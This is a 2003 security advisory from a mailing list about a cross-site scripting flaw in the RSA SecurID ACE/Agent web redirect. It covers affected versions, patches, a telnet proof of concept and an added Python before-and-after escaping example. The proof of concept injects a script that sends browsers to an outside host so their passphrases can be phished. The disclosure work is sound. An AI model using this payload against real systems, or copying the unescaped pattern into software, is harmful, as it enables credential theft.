[NEWS] RSA SecurID ACE Agent Cross Site Scripting

From: SecuriTeam (support_at_securiteam.com)
Date: 06/19/03

    To: list@securiteam.com
    Date: 19 Jun 2003 14:53:24 +0200
    
    

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com

      RSA SecurID ACE Agent Cross Site Scripting
    ------------------------------------------------------------------------

    SUMMARY

    RSA SecurID provides authentication and access control using the RSA
    SecurID two-factor authentication framework. RSA SecurID two-factor
    authentication is based on something you know (such as a password or a
    PIN) and something you have (an authenticator such as a smart card). RSA
    ACE/Server provides RSA SecurID access control for enterprises.

    RSA provides several RSA ACE/Agents for use with RSA ACE/Server. These
    agents provide integrated RSA SecurID access control for 3rd-party server
    platforms including Microsoft Windows, IIS, UNIX servers (PAM), Apache,
    and Lotus Domino.

    The RSA ACE/Agent allows sites to protect web resources by requiring RSA
    SecurID authentication. Web browsers are automatically redirected to an
    authentication page where the user is required to authenticate with their
    RSA SecurID token before they can access protected resources.

    This secure redirect function of the RSA ACE/Agents protecting IIS,
    Apache, or SunONE web servers contains a cross-site scripting
    vulnerability. The redirector does not properly escape special characters,
    so requests for a URL containing special script characters will cause the
    ACE/Agent to emit a page containing web script which would execute in the
    user's browser. An attacker could potentially use this to fool
    unsuspecting users into entering their passphrase information, which could
    then be replayed by the attacker to the protected server to gain access.

    DETAILS

    Vulnerable systems:
     * RSA ACE/Agent version 5.0 for Windows
     * RSA ACE/Agent version 5.x for Web

    Immune systems:
     * RSA ACE/Agent version 5.0.1 for Windows
     * RSA ACE/Agent version 5.1.1 for Web

    Vendor status and information:
     RSA Security, Inc <http://www.rsasecurity.com>

    The vendor has been notified. This issue had already been discovered and
    fixed by RSA Security in an internal audit. The fix was released to
    customers in February 2003.

    Solution:
    Update to the latest version of RSA ACE/Agent for Windows - version 5.0.1
    or RSA ACE/Agent for Web - version 5.1.1.

    Specific hot fixes and readme files can be downloaded from the following
    FTP sites:

    Customers using the RSA ACE/Agent 5.0 for Windows:
     * RSA Security FTP Site:
       ftp://ftp.rsasecurity.com/support/Patches/Ace/Agent/5.0.1_Agent/Win_Agent501.zip

    Customers using the RSA ACE/Agent 5.1 for Web:
     * RSA Security FTP Site:
       ftp://ftp.rsasecurity.com/support/Patches/Ace/Agent/5.1.1_Agent/WebAgent5.1.1.tar.gz

    Detailed analysis:
    Requests for paths containing special characters will cause these special
    characters to be emitted in the resulting redirect page. An attacker could
    potentially use the resulting script to quietly redirect users to his own
    website, where users would be tricked into entering their passphrase
    information.

    For example, the following session illustrates how to redirect the
    browser:

       $ telnet www.example.foo 80
       Connected to www.example.foo.
       Escape character is '^]'.
       GET /"><script>document.location="http://foo.foo"</script> HTTP/1.0

       HTTP/1.1 200 OK
       Server: Microsoft-IIS/5.0
       Content-Type: text/html

       <HTML>
       <HEAD>
          <TITLE>SecurID Secure Link Redirect</TITLE>
       </HEAD>

       <BODY>

       <H2>
       The page you are trying to access is protected by SecurID.<BR>
       The administrator requires protected pages to be accessed through
       a secure channel.<BR>
       <A HREF="https://www.example.foo:443/"><script>
          document.location="http://www.foo.foo"</script>">
          Click this link to activate the secure channel for this page.</A>
       </H2>

       </BODY>
       </HTML>
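
    The escaping the redirector omits, shown as an added example (not RSA's
    code and not part of the original advisory): the "before" function copies
    the request path into the link as in the session above, and the hardened
    one percent-encodes the path and HTML-escapes the attribute value. The
    template, function names and host argument are assumptions made for
    illustration.

```python
import html
from html.parser import HTMLParser
from urllib.parse import quote

# Constructed template, modelled on the redirect page in the session above.
TEMPLATE = (
    "<HTML><HEAD><TITLE>SecurID Secure Link Redirect</TITLE></HEAD><BODY><H2>\n"
    '<A HREF="{href}">Click this link to activate the secure channel '
    "for this page.</A>\n</H2></BODY></HTML>"
)

# Request path taken from the advisory's telnet session.
SESSION_PATH = '/"><script>document.location="http://foo.foo"</script>'


def redirect_page_unsafe(host, raw_path):
    """'Before' behaviour: the request path lands in the page verbatim."""
    return TEMPLATE.format(href="https://%s:443%s" % (host, raw_path))


def redirect_page_safe(host, raw_path):
    """Hardened: encode for the URL context, then escape for the attribute."""
    # '%' stays in the safe set so already-encoded sequences are not doubled.
    encoded = quote(raw_path, safe="/%-._~")
    href = "https://%s:443%s" % (host, encoded)
    # Escaping the whole value also covers a host taken from the request.
    return TEMPLATE.format(href=html.escape(href, quote=True))


class _TagCollector(HTMLParser):
    """Records every start tag a browser-like parser would see."""

    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)


def tags_in(page):
    """Regression check: list the elements the emitted page really contains."""
    collector = _TagCollector()
    collector.feed(page)
    collector.close()
    return collector.tags
```

    Running tags_in() over the output for SESSION_PATH makes a usable
    regression test: the unescaped page gains a script element, the escaped
    page contains only the elements of the template.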

    ADDITIONAL INFORMATION

    The original advisory can be downloaded from:
     http://www.rapid7.com/advisories/R7-0014.html

    The information has been provided by Rapid7, Inc. Security Advisory
    <mailto:advisory@rapid7.com>.
